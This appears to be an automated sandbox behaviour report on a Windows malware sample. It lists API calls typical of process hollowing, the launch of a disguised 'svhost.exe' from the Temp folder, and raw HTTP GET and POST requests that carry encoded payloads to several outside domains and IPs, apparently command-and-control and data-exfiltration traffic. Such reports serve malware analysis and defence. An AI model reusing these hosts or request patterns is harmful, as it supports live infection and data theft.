advapi32.dll.GetTraceEnableLevel advapi32.dll.GetTraceEnableFlags advapi32.dll.TraceEvent mscoree.dll.IEE mscoreei.dll.IEE mscorwks.dll.IEE mscoree.dll.GetStartupFlags mscoreei.dll.GetStartupFlags mscoree.dll.GetHostConfigurationFile mscoreei.dll.GetHostConfigurationFile mscoreei.dll.GetCORVersion mscoree.dll.GetCORSystemDirectory mscoreei.dll.GetCORSystemDirectory_RetAddr mscoreei.dll.CreateConfigStream ntdll.dll.RtlUnwind kernel32.dll.IsWow64Process advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddVectoredContinueHandler kernel32.dll.RemoveVectoredContinueHandler advapi32.dll.ConvertSidToStringSidW shell32.dll.SHGetFolderPathW kernel32.dll.GetWriteWatch kernel32.dll.ResetWriteWatch kernel32.dll.CreateMemoryResourceNotification kernel32.dll.QueryMemoryResourceNotification ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware kernel32.dll.QueryActCtxW ole32.dll.CoGetContextToken advapi32.dll.CryptAcquireContextA advapi32.dll.CryptReleaseContext advapi32.dll.CryptCreateHash advapi32.dll.CryptDestroyHash advapi32.dll.CryptHashData advapi32.dll.CryptGetHashParam advapi32.dll.CryptImportKey advapi32.dll.CryptExportKey advapi32.dll.CryptGenKey advapi32.dll.CryptGetKeyParam advapi32.dll.CryptDestroyKey advapi32.dll.CryptVerifySignatureA advapi32.dll.CryptSignHashA advapi32.dll.CryptGetProvParam advapi32.dll.CryptGetUserKey advapi32.dll.CryptEnumProvidersA cryptsp.dll.CryptAcquireContextA cryptsp.dll.CryptImportKey cryptsp.dll.CryptExportKey cryptsp.dll.CryptCreateHash cryptsp.dll.CryptHashData cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptDestroyHash cryptsp.dll.CryptDestroyKey kernel32.dll.GetFullPathNameW kernel32.dll.GetVersionExW mscorjit.dll.getJit kernel32.dll.GetCurrentProcess kernel32.dll.GetCurrentThread kernel32.dll.DuplicateHandle kernel32.dll.GetCurrentThreadId ole32.dll.OleInitialize kernel32.dll.lstrlen kernel32.dll.lstrlenW ole32.dll.CoRegisterMessageFilter kernel32.dll.CloseHandle kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW advapi32.dll.AdjustTokenPrivileges kernel32.dll.OpenProcess kernel32.dll.GetExitCodeProcess kernel32.dll.SetProcessWorkingSetSize kernel32.dll.GetUserDefaultUILanguage bcrypt.dll.BCryptGetFipsAlgorithmMode cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptGenRandom kernel32.dll.GetEnvironmentVariableW kernel32.dll.SetErrorMode kernel32.dll.GetFileAttributesExW mscoreei.dll.LoadLibraryShim culture.dll.ConvertLangIdToCultureName ntdll.dll.NtQuerySystemInformation cryptsp.dll.CryptGetProvParam cryptsp.dll.CryptSetKeyParam cryptsp.dll.CryptDecrypt cryptsp.dll.CryptEncrypt cryptsp.dll.CryptReleaseContext kernel32.dll.GetACP kernel32.dll.UnmapViewOfFile kernel32.dll.DeleteFileW kernel32.dll.CopyFileW psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW kernel32.dll.GetProcAddress kernel32.dll.CreateProcessA kernel32.dll.ReadProcessMemory kernel32.dll.WriteProcessMemory kernel32.dll.GetThreadContext ntdll.dll.NtSetContextThread ntdll.dll.NtUnmapViewOfSection kernel32.dll.VirtualAllocEx ntdll.dll.NtResumeThread kernel32.dll.SwitchToThread psapi.dll.EnumProcesses kernel32.dll.GlobalMemoryStatusEx ole32.dll.CoWaitForMultipleHandles sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW sechost.dll.LookupAccountSidLocalW ole32.dll.NdrOleInitializeExtension ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree ole32.dll.CoCreateInstance ole32.dll.CoReleaseMarshalData ole32.dll.DcomChannelSetHResult rpcrtremote.dll.I_RpcExtInitializeExtensionPoint kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx advapi32.dll.EventUnregister
Execute Commands
"C:\Users\Seven01\AppData\Local\Temp\svhost.exe"
Started Services
Nothing to display
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04b_64 | Seven04b_64 | VirtualBox | 2018-07-09 23:04:14 | 2018-07-09 23:07:06 | 172 |
16 HTTP Request(s) detected
http://www.plodameg.com/wo/?_ZLL96=GcXdlIa6ZxlqRbZegdKsNXkvbBeiEnvqHFxsuUIxgQvlLphwtCbkHoPUJWL31ZKs2L7IxmKC&GzuD=WBjTZrcXj
- Hostname: www.plodameg.com
- IP Address: 199.192.20.201
- Port: 80
- Count: 1
GET /wo/?_ZLL96=GcXdlIa6ZxlqRbZegdKsNXkvbBeiEnvqHFxsuUIxgQvlLphwtCbkHoPUJWL31ZKs2L7IxmKC&GzuD=WBjTZrcXj HTTP/1.1 Host: www.plodameg.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.alexander-international.com/wo/?_ZLL96=P1GwTOxNZA38J/ty9S5FskuZ18tjN2dwSBOS9pFPubeNqfHReGsJZQWznW45HPxeFtCDSRf0&GzuD=WBjTZrcXj
- Hostname: www.alexander-international.com
- IP Address: 52.5.142.190
- Port: 80
- Count: 1
GET /wo/?_ZLL96=P1GwTOxNZA38J/ty9S5FskuZ18tjN2dwSBOS9pFPubeNqfHReGsJZQWznW45HPxeFtCDSRf0&GzuD=WBjTZrcXj HTTP/1.1 Host: www.alexander-international.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.alexander-international.com/wo/
- Hostname: www.alexander-international.com
- IP Address: 52.5.142.190
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.alexander-international.com Connection: close Content-Length: 2200 Cache-Control: no-cache Origin: http://www.alexander-international.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.alexander-international.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=HXKKNrI4AHn5IaIH~0gFxTeF9900MCBGAUzA(JFKipOqk83mXjIlN0K9o2saTfFZEIqJcW~M~-g5Ol9eDc3svba05tZLFxhOj3NjT17jVyAx0pj4qoqyzqq3f_3je5n_IfSyi-ZOXNB_kKEbDqxGpr~azkRcut0M(mzlE-ojIMiwTH7oTlVan4gt5_mDxTyciQ2aUWBcvEjZ7RW55b7oPYSSKzmCr974cQ4HbQB0RNMmmcsaheivoxD4m3B06fC7iFBtUjuiRZgBKhkXBu~a~hrP86MXtzeQIrI15vRm8WcSwz6lWGLQbI3BI5crFWezCSDXj4WduMKNYglsbjAGHQ~VBBaPmj3_QZnIGICCoPCITaH7g1lRneg5lUTB6c9-Cpmy6xl5zMS39s(DWPl1waUzDS5PQ2VDjii4CsJCnfJRbE2Qj-V69fJzcoJ2BZ99gVO7A5SltSJtO-YUh9bQDFAl(ekFs81fm8DF(h2w6ZZzNuBX2rvfZaN563k53R5WyOHMZEp-bX02fCkOfND_yvSvOnQpX0sN(6yY3_lfny~4lo9MYSnX(jD8Q9ccoy(IyyKdaYIyJnEkiPkBQ2JojVN4q95rLIyTvCGEH_HLEdlCC0MfssqyXTTXFBICxGYHjTv-TkWDVuDyNm8cBPR9PFlEZeiiZzrcJMqpsWBIq4iY0ZTVGrkRGq(7YL8q9g2m3KUSpyHDInVmE7dT4jotjUa6CAvaUi2BwGheSGBAElvsy5(4fLBzvgmE34SAFc9qbLkIGZSSsvRhP9ncYH(IsBEdbsURhaT9MFArA3d_xgWeZjm3B3AqPuLH66UYmCYn5KUxsIQFrhQUJy0WuORbmaNf3A(r8j51MostjP10hokT7oWEnC1ovL5rmubl6Rsh5hT7F37xJ4SqzbBeo8Jxc9(flD(alExFdkEGX529pkiQSDHJDJURuo~_OuCt60e7IEy_91i6YBcsSRl_qGf-LolNWRTcZrvR95E91-zytlFiu-JxYg061lRgSmEgLNmVf3ip4PS5lHjRJiiMSpdfKzVvFgPX6nT8XqYiyz20hO9BohU1k5ykggAim8PzIPBi7x5yVKGZXbFEc552yjGQuWAAG8sRHelVXy0T8bXzK9BPKhqm09WCKQwo6hYfKVMkVxskIXnEayRQJldtghRNoRXt6xqMBKOY0n389Azjc0rTbBn2StdDPkrBi_hVBbYK(uRGD-P77y0FzPSWskLvqNrsUj0EQ8s1KBkEtVBKD3PIBJc4qYcRfL~cGCY4aOCh5GvTZpC6Qn9XE8kxxB4P8RB1EtB0LbYAj5gpUR(cSigPGZm7J59vdNnTo6vdmQtAxdwu0vRifWMXeDy11bkG8D5kVdOFthltXMmgwC91EbhBUH94cWtDGdySukaSoEMAXqLlEiprXSpHtkUH8qVeKDvuHYWb1hm38eeDvFL1hnFK8j5biEfKDesRD82nzNmDEtYZp7a9FC37LAbejr1wcK8SwCV8Z5JAB5GBDVcNfe4iBWoRXl4-Q3ti(DF6rfSkfa7rFeoPvbJmt-YSiJiPWybqL_ztI-xT2D139iNukKQAiDm-bBnr~tLiH10EWF0dCQYqi7NFlmB-qjBV6fuKgbseysgcNLPvk8izj3Lzz3Pkxdnn9GrUwUGajujJmYb9mkI4LwwxlTAe5hP7kBZZjU(20wggiZLNnf62uJ~LYBJvRipd8F~MbI1krQb3~LUldTaebIATdobx88jMmHzJ2re8kduldcocOkZ8SfmBdLp9Ur9Yeu5t1d3zQAjN6gUanEEp5btbvqG6Xoxi0Sc3L8CovJ(RQdJrCqzQfOOO7nwdGcI_5N8ZnOm7yPrIUXanwsad~x85BZa-W6jQGZKZ0Udw(RngrQ1Hg03fZXxe9OQ9P4bg8po4pygla-Uu3vhd7SuP05~pWHnO4v~1HTvjGDn-LJqiyIeZl2sp2p66w4UU6q3boQ(yyt4g9K1hjaWl7HOQ2Dv2IBTr9gMYRSdEnll6Iv2ImbekKNS1~KR_k59J6fiV7uNz6iqMeC1OT4RPSrvHeS8Dq5jiGs2OUcjog97VIw6qO-54uOBpzY9HW6hMwZTbxAMsIKnVtWQTZPviwO7M0UPjrQqsBd(-eheg2lFWfX9s~HVXEqrkZFzYiafcbgU6N5oh5J4EGBI_BsF3oG2Dwn4v8mzn\x00\x00\x00\x00\x00\x00\x00\x00
http://www.alexander-international.com/wo/
- Hostname: www.alexander-international.com
- IP Address: 52.5.142.190
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.alexander-international.com Connection: close Content-Length: 57160 Cache-Control: no-cache Origin: http://www.alexander-international.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.alexander-international.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=HXKKNoZLF3roZIh_61xYsjuRytw-PVt5DH76(I1O5Ye4jcHmfBgmKUK88GsZY_4waOKBcXKi~-o6X3FbB-f3sLGmm9NSUElBjVxJYUDjISEz6b7jm9Cu7uCxLtGjF6fOHd~2rblmTPR0oItyCMsHtbro4FEVuOR74iugIdYKCsGABAPeTn5n9NpR3cX1yh7rmXuaXlRqkn7XnCf8~ICab8XGJyWFlMb7fSgXVRF5XMEy(7omj-mmzAzFrUht6P(6lDRTZjyRcLsNBQFoANSo(QblktwX6y~sLpQu0vQA~WEVrD6ZWGPYa_G4UpctagvvHyaCpYGNu5WNaC9_MxoDIw(LIxqDhU(2QZ2SH4KCpNmIFOb0i1lRp-g_lUTZ6c9XCrGIoh95j8ux8ajzHs5By6UJET5jU1gqjjqgCMVCkuteNxeUpLospqJaPIwoBZB4hUeRXIu4sSJqFv0Ll42JHVw6nZA2hsh1mf(w4BO89u5ZU-VpmpDTavpo~0hk5EA1zuCxM1EXdRQ8e0hZPcXr7O(bBFE_Hlcyu77I3vRL(AGWrohbPwCMpxiwWLsatTvN3BLVPZwNMnJ6oaMQQV1Wy20LodVWEqzA63yoNP(qA84QLnsXkYTkT2OueXJ1wkEf2CfwOyL1E8LDDQ0-NLJBCm9kbOu6azjpXYvHmX998val4szNcLY1Q4HweYF7~CGCssstlwHCO2RpJvBv9Q0WkkyLLzXCICHbwFBaS2FAFlDsk-L5co5w0gnP7oScd8xYbJkUcZWStfBjJMnGcViyyxFSXNYClazUMHtiB3ICnTGZITGzA3AtAsu7rKYriGlC56AhmdQs6T4EPhMfkLxAibt12gy3lhdCY5Av9o4xqJch0raUrm9ggox6vPDEwgZj6U33X0WMdrKjq-N4odRPZNz8qkLFlWoQX0cnWZCHn2XMZjqeRpgJ(NS4OcCH7Ru3BXLvkBqsRRonTTQEuFjmHa0dWxX6QJfazqM30Jm2uzU0pbldREkB7AdSTCgaNpreAF(a0dbH2mnwOxT_Z6RCLAUEHQKj9iCdZ91M0EKVytQxuT4jrMKcjDgQgqfeGOYnzhZ7AMaUS_h1dpdGmyjNl19iVc1VRZ5lXwMl8-(zLtJPYCim8cL0VEhn9S8jU1QpS30mJ1PbJQpNY1ROojA-uDTXrR~RYd~F13~B1TSbc2LTbiTJXMliIlmbhch3BK5Ko7JSa6ibjzEb1I~tpiidh727W39sSt88FBJ5uTtjDjezCtYtpb0mSbK0TBIPYOXhxGP7T5m3IEFLMvpb1zkHnA4ePqxlXp0InNkuMXysERQ8O6SMZ959fdaDqKOT(SBe1qAJh-loXCkTQAvssqci4l5RcPb_swJXd9yHwn5kDO53YUAgeDY5G_SD8FmGp1BaQfz2OBpWfxkEi1gK9K9xSHP2bufe6li21-TU5hLjgwwd3VhokDKbO-sia8uzmfGDEuoFj_ykXj7xLUvnktBRaLUThxNUUYVgJZ6wVHZgTeQ2LR90UVgcZV1y7ABE9-WnabuMDsJRvrozmPkSvYCuOjLSKeasWeBth0VB6jt2kJ0HsCefPhToxtOiF1VTA1BnJwQhvqFT9H5ml1FVyNKO1oI0s70WMMTr~vWonEnZzHSzg_jB4Qbm~FyU0dzZi6j4il8AYg8TrUIZ8y2suBdItVvU2Ahkn5(smv2CuLv3UyxoRjBew0W5Y6l6~EeB(JsHXU2icpgfGuf61eL1vnDMypyMhfbpd4suDjJAUYG6ea5VQ8piV9QzxvziQ1eCrD0eqXhfvv5MiN3NRLlh3Qkgctuv(rORR_FVHrb_I_PrnhdbApMN6IMct-Kxs9aecH2o9-KV0Tk-DtC-UZ7XWJGLzwZmhFPf0R1jkFbpRU5t8vRvGoCi8qYE8SgbZc0A495owxqBuN3ld26c7p6zPD3jJATIP4zE1LS6xBQ1(pyzxboJ25XZnH~_29E196NMmaqazheRywjoNRvy1jwKDn1VpkdeKKOgmZf4Bv2YvKtAor9k5t~f6_BK4Fr1Z1ZcM5NzfKLcfBgnp43TbdGzEMXnkqvlIjiMEtwlvvt3~6ciY5lVsamz4kIsc47M6WsGU6jqhMes5GSb2iO_WsrSZRzwoFgKQ0NO8HZ1QJ(zbn7ToYXaZDM0QNgV4aFhBUcDBrNmhHuL0g8DtD6y0-67M8HYlVhPkfHT1Thb(ARvLLkKvimsIvl4GquTXe35~aaHSVPRta8kt3btYeQpczS5Nf(lmuDPluIvL4PLYgr_QdQiwhZ68-(i3dSpFsh8Y9zVMvL718HqrVKnz1znPh~9zCbNKwSMgAK9D8lz~Iy8ECdZ7QHugYa8VMAl5DUvPn0INatMi
http://www.ipducks.com/wo/?_ZLL96=BmONLxxZHLtt6vXOLyHcOkXnIvM0pG6jXWO82HH9Q91vB3kvQ1F/r100Oe9lPOEOlw/K7kba&GzuD=WBjTZrcXj
- Hostname: www.ipducks.com
- IP Address:
- Port: 80
- Count: 1
GET /wo/?_ZLL96=BmONLxxZHLtt6vXOLyHcOkXnIvM0pG6jXWO82HH9Q91vB3kvQ1F/r100Oe9lPOEOlw/K7kba&GzuD=WBjTZrcXj HTTP/1.1 Host: www.ipducks.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.ipducks.com/wo/
- Hostname: www.ipducks.com
- IP Address:
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.ipducks.com Connection: close Content-Length: 2200 Cache-Control: no-cache Origin: http://www.ipducks.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.ipducks.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=JEC3VXI9YLVKnqz4M3TLZE3RMtMSiVK0PDzP6n68FuxmRmoNbh1T4wdZAZdiOIItxy(r3DDUe4Ujpj0F57MKxsJSSgy0srVtO_HjXKxziCI9fEcOciAt4Xcankvd(EXq(alNuBWpA2IGyYcE~ju9g7CJzcQ4eut1NZ9s2agXOqds6SmcLNCzp7jDJ57j2za5fY0ZG_DATOpPVNY4jEMgP76oVe9QMI0eHJmFi7HLI7~7XK2jcofj2uijjDYnfYtfM0VKOd~4Taji88kVQa9UjDJmgnjjDVs1khcy8TBhPHYCwxGvzQfmpx(CjwZY3u0JW8kBbfNIvaefRRSCcneMa6LKNKo_bH3wvsIWYjXQK3rsHgNiyLkisxGSUNx7plXS54xKX3uZlf8rEYlORHr5juSgug1hQ0Fls4hYJtba0_Z_jKXJfVtONWa8D-bIYVlgNRIyawHLv4OY7A9r1XQ-T66yA15W2Zpu4JS-lE6YNSxpT-p_~3bTIcJSMBbo4VsodyinC8UTkOiqjCYx9crlXp6bkvu7YOAoHd3Cdd9aaA~wg9w0Bt7dUXfUAhAPPWCFQfxF9LptSBsBSnGqjvyhvojZrd(VzFYY34adlknpQnx6B_N-qggYvzscjxhYK-a1utYc(S9_I2eb6TVNlVltk4adI1p533ZTX3(iO0oWhga7CJ(K7jEdOdtgwLcB10ryv05l0UoCE8uUdyNTE7pGPg9mrXRiKQ15VVpOidnQP92digOX~R1ZxI5J84VbJO2wB-zYMxClfR7pTqbDx9zeo1fxG0ZbQh~Lym(ROQPxLRFx~2PnzsLSWVXCWFx1AH6OzdV0xze_YA~KoAjcnjzMtsqeKTIK~vlq03DCnoz-(L1dzw1ARckNLqa5J_oPLEekBqvPxkEiSmAlAwz0aDVsZQSlNEOkD3Y5l7bLMfKdiADRusuEaLL8PMshsD6v(DmKfY8Yml7pQ32PoDsL8G5iwTHpJ_oTV5ILgqojM9nfT09fUWJszN~tk9l6mZaijKnSusaibJ7xiTcypE1gIEv2uXBUgTpXqyLiKZE4Uy82mD6_Gp3hA-pBDKBDb5wqW6ORpWAfUz5tKWpxzLWwiecg(QAYui01kEaMzfnIceDD9OqBjeEu~C614TT6jte1~ozQORGEl29aBQKYx95EcfBk0sNHMsHiBGjSviMJGCENBkSHx-zO88Jda7RUw2lDU_EiHDleGNuUXfTuR9aXBMctQB52dpzoAR4dCtXuov8BAw(GGy3M5yNcjtcnV0ss3Px5AIwXRbk5rIHctwksynF5NKb57e(XTS~TuVLSksoYhBSmpym6dkABybWz2u6qzZJuJfr0trRndGvz4MeCY43Iee46XOX1TYAOehtVjSxTt2jQBAA3CdOObDfEw-rroaTs7j9_KjW_rGcPUb4T1xA-fS8vT7dt(dWIa7tC1UVEp08YBDVDhYOq2d~LB5rRArdQM0a57Cbl8AleeG6wesxFI1L_Kju1fjkKvqV15EF6BFY5APD2OZtAic78xsoDxwxNFJNN5kEt4Nvl0gju4-cCwI9EqamVm8N0axwHwa1Yk3QYWuzkKKMQQxlbQKAZx5fEFP5R3I8iLjbc2Enj3-MFIX3JRfs0VhBaqn0FLBSEvm2F~hNj4dasGmmeBgxJOM1Plsc9DXSnvVIhbLLAKK0FfGKJYP9-~c54jqKUARLtBB3mXp2HG74FjQ7L2d(T5SXl1o20TvaIGfsDfS4ih5mamRvV~wLazCrvb-7ck4Za1Wo5SN7WO9Et0KbwI0bUk4YU~jDGTEsZ6P04ISa9a_tGvDSBqiPlq-B_NBXT3eiFL6o8~rLTWckHahogPYAx3Up1HlZqX0iyFTlE7YniuDxiEUJW50bZ15iLSr0oGjIO5uvDIv6LDen016qAIWG03jy3zY8Bnxv1898Xq0mPlfxcWfy_BwrIQjMLRVREC_a110MdE0p8kWLg82WIPeRxNqXARffsih1AmD4adxcrB2MalLdF5v7z7fWBUegsiDaVaLYkahjhww9n5uuqdV40utsviwF9Vy0shw~0tpeb0dVdy94bkTycUqt3~GIHDC~bKea3Rhla1PhjxAgUO9vlGu6cixLpm8L9YMmfl6C-uel9ubKgCnA7n9S0cynoakks3L6QpM~X8-EPbTs2qTgMsd5l00D9mkhKW0tm\x00HVXEqrk
http://www.ipducks.com/wo/
- Hostname: www.ipducks.com
- IP Address:
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.ipducks.com Connection: close Content-Length: 57160 Cache-Control: no-cache Origin: http://www.ipducks.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.ipducks.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=JEC3VWQDZ7RhjobXI16GdknGE9Ic5imhVQ7i6kiwRfh4GTgNQDdQ(QdWEpdhf4M_ygvz3CG_e5sgxWoAx4lcsMVEeDO975tyOd7BSIRzny8sCCgRbQkpnnQYpB7Ymk2M9_dJ(DP8KXANw9o4sVy5qrGK4_s-eN5bKY8v9-IENvt2(A~ULOPHgbz2CYzY1ADCOIAZEOrQbuIJLd5rkT5QNKrGd-NpJYUZANGV65reK_Cnf8HaRoT0puyeuiQIYJB8JyF4TtjORsjuzOtsU9dcjz5A6WrjLmkzpC195zBaJHwO~RG5zRqr4TjgmwZa6LsaSc8JCO8NvrOfQ0XIel25DKLvPaYofwfrvt4CKDPQLxDsNkplwLki5BGQUNxjplX_56QLW3mZjfQtFr9-UV2KsuS8viMlU3Bes_tQJJra3P94oPzNVktNZHv7KeTDYVYgMQYIeR7Wu4OHvEVB4zFvHaqhfnZtl5tU4pG1ljXMMTt9V-sKrT(fdpMtdRHwyEBQPCG3AdZ6zYukixwV8-HxJ6~N8_SXOewXWfaLcMIBPyWku990WLyER2X4UjMeFXSEHdANxYpoRBoeWXnSjMOLo6Kk7tS6xBZ994jihEO_VAwcIt9cmRcrqW5vs3hsevuw35ca8wFyCxrJ(CN_oRgM5PG9Z1dL03gzY2bBKSIzwSWCZrTSyT42K9MLx4lo3RvWwEBRqX41CtbmQmFrIp1tYnRDmkpqKnJAVVh4ltTQM5OdmjWQwX9e744ChoVHUerlB8DMehWlZiTrSrbZ1tGklVe8ExxfUgeyylPePRyMBxhu53v70sKYXw(5QF98dT(hzu4vk2(geDGauT7Zj2bLpvy4FTEYrupd~V3EiYDur6tB8wh6CNs7PtGSGbEqPQGUHa(T10wfZHwYKmuRbitabT35CmX8DhMVhLT-P-vK5C2MkI6uIrX0epMit2G7wAzLXOkHtEfFbniqrCAnrVFLzBHSJfs5X4MW7pQTNLvIUlo9X0Z6s4OGqfEV0sCIluzQj-GeZKj0nAgHuStcCSDK61BZsjl2kTvCEOwiXCUpgErPH7brca1tBrJhSMoXe-DKmANVP1t0J3xL15qi8_oI0zQpo3I-1XC4ze3qc-nDpeiBhOku0nyI8ni9kf7Q3Z2QLTCakTpBACyA6Z9RXdRqx-JpfoHrPhDbj0VpOVp3BimHxfu05fNBUfBD42tHVvl6NRAEKdq5dNLOX63Hfbg4b3FiaZfTDhoAf83K9ppzHkm7JzvV3QVr69J-ZlUA1PleJKpIFY4-yPiH4Sou2UY2HPvP0ZWffUGbomKbrv4rqGPPhUudNBcX6brh0eah5PZONoSd2eZpFETJ8cqWQansSc9KZurVbqF1QUtyiwhCunufIXJhOvf0Cinj0uKitrP9(S5sOWTvw34TK78IzRZkKzQRW9N13cGJUbh-kWxWsn8mERNfgPqU1d~WLpzFLtJQM0i92Cmh9zxAe36jOOB4dg(-GCOZcnkqkLxu~mARCmYtJMqjHJ1I3JHs1slS1FdKTrxr8Xk8qeWCsgvu6P998sZgq7OJrs9WODwTgp9Qk10bWO6mQq5YMhwBWIY3nJ7XXfhUoMosTHH603PjwLUBTgnjSdoIUipWzUcWOy(ruWqRpEE8xc7DakKULjxnEONKvMYJQnfwiXU9XNXDOqJDKUinLP8jyf03ldCKAQjmP2avXsCAZqgeihTJvPGp~VXtxLGUSO7BPMsQQwBY1Ni57TC0ySPSzj7NZtvsi4lhn3ZmVeb4Q_cwnpeOIFSGjMoQ20zzXFMOpcoGQAO4b9VVhjOaszn8rctFMB(75firBuI5upWoVZcKQVImP5Zd8AZuBRxiSzm1IGVE97vltj9KDw0d61297sWBWapTOj49(LaycOCCDe(-~qqIJ12giRbF8-klqQ7P18xxr2ONsP5cMJyjKk(pA00wZ00GAfyv1XwmQGp-rBLys2TSMu5QIqbVZ9zXtD4DpxsfUxI5Az0b2q1h(KXb7ePHa4h6mymQWfUzYz(rxk9C7PqeLTsIysxWtV0bUiAAg0mBjIu5kNRa2tgOkDDJCegs9nkFKhf0EdeiQyRt8v5j5D87Z-qRcPCEojuXlN~ectqui8DbkOodqvKnNExCh66GIwD_aBgd8LaN7_WRjPsxBiJ2tVMkjLNFpmWX0wxGWDwcKcsW6wvvL-QtNM7VvzhT2ex068lZc-jftVM4ykVEb7lxk3EDiq8Aev5es-8T46OicZ~A~qkRy1yNtFWk4xqwXwzzVbukBsCh~I~_3DpXL93EiPHkI5t8lNMZ1gbNJ12YE4GvutrmauPe3dAmT7plF9pq3QYgZebf7g~YbOVWGD4r8AS4h7991Xj2h72uCAH6R9zDskhdMTs5qzLYVtv2B05fXY50Rt(8GfrsN
http://www.employeevita.com/wo/?_ZLL96=9i209dyIyU9F20iTxpg1zH/IiUX0PjkcVL2t2gvEXPLkT8PW7wISloIb9cUcaBh89qBzU09+&GzuD=WBjTZrcXj
- Hostname: www.employeevita.com
- IP Address: 52.72.89.116
- Port: 80
- Count: 1
GET /wo/?_ZLL96=9i209dyIyU9F20iTxpg1zH/IiUX0PjkcVL2t2gvEXPLkT8PW7wISloIb9cUcaBh89qBzU09+&GzuD=WBjTZrcXj HTTP/1.1 Host: www.employeevita.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.employeevita.com/wo/
- Hostname: www.employeevita.com
- IP Address: 52.72.89.116
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.employeevita.com Connection: close Content-Length: 2200 Cache-Control: no-cache Origin: http://www.employeevita.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.employeevita.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=1A6Oj5Do1XxwmRCP6-pvx3PdqHqnMDpfTcm7~RLzT8PBbt7TzBYYydhZ74ASEwZGkrNxbho6mMetzIUB7NcCpa1x6h01jG7wl2g6LZgaXzGh15oQ~sZaMh4QjTU4Ucd8Z-o9uyDEstvDY-4S1xG9QA24o7tOv1pGqx(J~ICCXQs60-w7O3DSid7bqKeJLnERX2Fu2ElNLl(z2cvUJ8Yhe_jKZ4A30bA82To_Xm8ccBlPOMjN0SfeY-oZoK(TK_0zFKTnmVJHE0IJyqxdBzHf1rwewkbzLYgY0ZL87KO9tEEpAEe9qo9YcN7BEoGEH6FlsJgxsCliWCI3Oc5pWuFsiYaXXNdJuE7Ai2BlNaDKMBqMjtm2I9G2(9yMxOFN(TzDw2vR9SzqS5PaFL5CEgJLNE5n0Rz5f84UMImozb(1bic82qAum3d_edMwYCMMVrNJVZ6SG0IyKiMqRsyK2hjauD4PBcrzuqVEASO-XeyYJfshPorwEbCegV31wA~2a8oxiOGMClHxmsQ0Msac4TwZweL3u1h9A88yzrLEcSsWy6ucY-mdxxMjy_reEHpx0e0XvwqT4yK9In~pvexzp2iL6V7sDJtl~40O2WGflGKAkkvalh2rFiYdVM4vOcmqU6uoYasqwwinzvX9ABWabqrWVZNwWTAIcs2R4g2bPsmLenuiITksW6IpLn~lOw0WOlh1~T9SqQPw2IvLmI(GKh5VkWxj5OaUeGuurzWDQCNUfjFwH2sHCXY5lPXUFueaJ1v26TKqRdvl2K2JnyDZ5tda4I4zi0JspoloXRpqsdMtu90IvOHlpDlydEahXmTtWbb-D0X9cvX45iScLV9DCG1kikGuKKr1ZpalXj2JEFYQEQbR3AVWEzIs~KGhDSA5gUp3hWCv5cDeDXXz(9unTjpCcuF2iR8kh9PUs7TKx9w0hiVlLAng7GiamBisuQ4V5-Br